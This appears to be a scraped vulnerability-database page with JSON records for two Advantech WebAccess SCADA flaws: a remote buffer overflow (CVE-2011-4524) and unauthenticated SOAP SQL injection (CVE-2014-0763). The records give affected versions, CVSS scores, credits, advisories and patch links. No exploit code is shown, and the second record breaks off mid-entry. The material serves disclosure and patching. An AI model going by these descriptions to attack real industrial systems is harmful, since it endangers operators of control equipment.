EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0038", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0659" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "db": "CNNVD", "id": "CNNVD-201202-404" }, { "db": "NVD", "id": "CVE-2011-4524" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001548" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2011-4524", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2011-4524", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2011-4524", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "19fc5e90-2354-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-52469", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2011-4524", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2011-4524", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-404", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-52469", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52469" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "db": "CNNVD", "id": "CNNVD-201202-404" }, { "db": "NVD", "id": "CVE-2011-4524" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via a long string value in unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4524" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "db": "CNVD", "id": "CNVD-2012-0659" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52469" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4524", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNVD", "id": "CNVD-2012-0659", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201202-404", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001548", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "19FC5E90-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-52469", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0659" }, { "db": "VULHUB", "id": "VHN-52469" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-404" }, { "db": "NVD", "id": "CVE-2011-4524" } ] }, "id": "VAR-201202-0038", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0659" }, { "db": "VULHUB", "id": "VHN-52469" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0659" } ] }, "last_update_date": "2024-11-23T21:46:30.805000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2012-0659)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10171" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0659" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-52469" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "db": "NVD", "id": "CVE-2011-4524" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4524" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4524" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0659" }, { "db": "VULHUB", "id": "VHN-52469" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-404" }, { "db": "NVD", "id": "CVE-2011-4524" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0659" }, { "db": "VULHUB", "id": "VHN-52469" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-404" }, { "db": "NVD", "id": "CVE-2011-4524" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0659" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-52469" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-404" }, { "date": "2012-02-21T13:31:56", "db": "NVD", "id": "CVE-2011-4524" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0659" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-52469" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001548" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-404" }, { "date": "2024-11-21T01:32:28.683000", "db": "NVD", "id": "CVE-2011-4524" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-404" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Vulnerable to buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001548" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "19fc5e90-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-404" } ], "trust": 0.8 } }
var-201404-0538
Vulnerability from variot
Multiple SQL injection vulnerabilities in DBVisitor.dll in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary SQL commands via SOAP requests to unspecified functions. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBVisitor.dll component. These flaws allow an attacker to execute arbitrary SQL statements in the context of the web service and to exfiltrate data (including the account names and password hashes) from the vulnerable product. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. There is a SQL injection vulnerability in Advantech WebAccess. Because the SOAP interface exposes DBVisitor.dll, it allows an attacker to exploit a vulnerability to submit a specially crafted SOAP request, inject or manipulate a SQL query, and obtain sensitive sensitive information or manipulate the database. Advantech WebAccess is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, to access or modify data, or to exploit vulnerabilities in the underlying database. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-077" }, { "db": "CNVD", "id": "CNVD-2014-02243" }, { "db": "JVNDB", "id": "JVNDB-2014-001974" }, { "db": "CNNVD", "id": "CNNVD-201404-169" }, { "db": "NVD", "id": "CVE-2014-0763" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001974" } ] }, "credits": { "_id": null, "data": "Andrea Micalizzi aka rgod", "sources": [ { "db": "ZDI", "id": "ZDI-14-077" } ], "trust": 0.7 }, "cve": "CVE-2014-0763", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0763", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02243", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1654b8d4-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68256", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0763", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0763", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0763", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02243", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-169", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68256", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-077" }, { "db": "CNVD", "id": "CNVD-2014-02243" }, { "db": "VULHUB", "id": "VHN-68256" }, { "db": "JVNDB", "id": "JVNDB-2014-001974" }, { "db": "CNNVD", "id": "CNNVD-201404-169" }, { "db": "NVD", "id": "CVE-2014-0763" } ] }, "description": { "_id": null, "data": "Multiple SQL injection vulnerabilities in DBVisitor.dll in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary SQL commands via SOAP requests to unspecified functions. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBVisitor.dll component. These flaws allow an attacker to execute arbitrary SQL statements in the context of the web service and to exfiltrate data (including the account names and password hashes) from the vulnerable product. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. There is a SQL injection vulnerability in Advantech WebAccess. Because the SOAP interface exposes DBVisitor.dll, it allows an attacker to exploit a vulnerability to submit a specially crafted SOAP request, inject or manipulate a SQL query, and obtain sensitive sensitive information or manipulate the database. Advantech WebAccess is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. \nA successful exploit could allow an attacker to compromise the application, to access or modify data, or to exploit vulnerabilities in the underlying database. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2014-0763" }, { "db": "JVNDB", "id": "JVNDB-2014-001974" }, { "db": "ZDI", "id": "ZDI-14-077" }, { "db": "CNVD", "id": "CNVD-2014-02243" }, { "db": "BID", "id": "66740" }, { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68256" } ], "trust": 3.51 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-0763", "trust": 4.5 }, { "db": "ICS 